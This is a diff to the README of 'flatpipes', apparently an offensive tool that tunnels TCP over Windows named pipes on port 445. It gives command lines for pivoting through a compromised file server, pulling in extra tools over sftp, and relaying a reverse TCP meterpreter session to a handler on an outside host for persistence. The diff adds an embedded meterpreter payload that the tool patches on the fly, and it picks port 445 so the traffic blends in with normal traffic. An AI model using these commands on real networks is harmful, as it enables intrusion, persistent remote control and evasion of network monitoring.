dxflatline/flatpipes/README.md

 Finally, netcat on the two hosts on their listeners and chat with yourself.

 #### Usage - Bring a remote port here

-Let's suppose you have access on the MS Fileserver through a Windows "jumphost" workstation.
+Let's suppose you have access on the MS Fileserver (x.x.x.x) through a Windows "jumphost" workstation.
 You want to ensure all communications are over 445 since it is normal for workstation to DC.
-We need to access SSH on another system in the server LAN but we can only connect to MS Fileserver 445 (and eg WMI for command exec)
+We need to access SSH on another system (y.y.y.y) in the Fileserver's LAN but we can only connect to MS Fileserver 445

-On the MS Fileserver we create our pipes for "IPC", and as soon as pipe negotiation is ok, it will TCP connect to the SSH server in the LAN.
+On the MS Fileserver (x.x.x.x) we create our pipes for "IPC", and as soon as pipe negotiation is ok, it will TCP connect to the SSH server (y.y.y.y) in the LAN.
 All IO is through the flatpipes:
-> *flatpipes.exe pserver sclient pipename .
-10.0.2.2 22*
+> *flatpipes.exe pserver sclient pipename . y.y.y.y 22*

-On the jumphost we PIPE connect to the MS fileserver 10.0.2.10, and immediately spawn a TCP listener on localhost 22:
+On the jumphost we PIPE connect to the MS fileserver (x.x.x.x), and immediately spawn a TCP listener on localhost 22:
-> *flatpipes.exe pclient sserver pipename 10.0.2.10 127.0.0.1 22*
+> *flatpipes.exe pclient sserver pipename x.x.x.x 127.0.0.1 22*

-Just ssh on 127.0.0.1 22 and you are through the town portal
+Just ssh on 127.0.0.1 22 from the jumphost  and you are through the town portal

+#### Usage - Send a local port there

+The reverse of the above example, useful to download additional tools through eg sftp

+On the Server (x.x.x.x) we create our pipes for "IPC", and as soon as pipe negotiation is ok, it spawn a TCP listener on localhost 22:
+> *flatpipes.exe pserver sserver pipename .
+127.0.0.1 22*

+On the jumphost we PIPE connect to the Server (x.x.x.x), and as soon as pipe negotiation is ok, it will TCP connect to our sFTP file repo (y.y.y.y).
+All IO is through the flatpipes:
+> *flatpipes.exe pclient sclient pipename x.x.x.x y.y.y.y 22*

+SSH on 127.0.0.1 22 from the Server

-#### Usage - Reverse TCP meterpreter through pipes
+#### Usage - Reverse TCP meterpreter through pipes (own payload)

-On the MS Fileserver again and you want to maintain persistence, but over 445.
+On the MS Fileserver (x.x.x.x) again and you want to maintain persistence, but over 445.
 You want reverse TCP meterpreter but also you want the jumphost to initiate the 445 connection.

-On the MS Fileserver, same as above, we create two pipes and listen on 127.0.0.1 54321 for the reverse TCP meterpreter:
+On the MS Fileserver (x.x.x.x), we create two pipes and listen on 127.0.0.1 54321 for the reverse TCP meterpreter:
 > *flatpipes.exe pserver sserver pipename .
 127.0.0.1 54321*

-On the jumphost we connect to the MS Fileserver and immediately connect to the handler:
+On the jumphost we connect to the MS Fileserver (x.x.x.x) and immediately connect to the meterpreter handler:
-> *flatpipes.exe pclient sclient pipename 10.0.2.10 IP_OF_METERPRETER_HANDLER 54321*
+> *flatpipes.exe pclient sclient pipename x.x.x.x y.y.y.y 54321*

 What this means is that we can exchange directions, eg use a reverse exploitation, but make the opposite network traffic.
 It is like an encapsulation over DNS, just needs some familiarization.

+#### Usage - Reverse TCP meterpreter through pipes (embedded payload)

+Same as above but the reverse meter payload is embedded in the flatpipes

+On the MS Fileserver (x.x.x.x), we create two pipes and listen on 127.0.0.1 54321 for the reverse TCP meterpreter.
+Note the "revmeter" keyword:
+> *flatpipes.exe pserver sserver pipename .
+127.0.0.1 54321 revmeter*

+On the jumphost we connect to the MS Fileserver (x.x.x.x) and immediately connect to the meterpreter handler at y.y.y.y:
+> *flatpipes.exe pclient sclient pipename x.x.x.x y.y.y.y 54321*

+Important note: If you meterpreter listener in waiting on eg 12345 just use the following:
+> *flatpipes.exe pserver sserver pipename .
+127.0.0.1 54321 revmeter*
+> *flatpipes.exe pclient sclient pipename x.x.x.x y.y.y.y 12345*
+The first command with "monkey-patch" the meterpreter bytecode on-the-fly to make it locally connect to 54321.
+At the jumphost, the 12345 can be used without any interruption.
+It is like NAT'ting a port on a firewall
 ---

 #### TODO
-* Include a meterpreter bind/reverse stager (exec will C# virtualalloc / createthread)
+* Include a meterpreter bind/reverse stager - Done
-* "Monkey patch" the above stager to change port on the fly (on hex)
+* "Monkey patch" the above stager to change port on the fly - Done
+* Custom payload option
 * Exception handling.
 Asap when pipe auth does not work
-* Think any other useful scenarios

 ---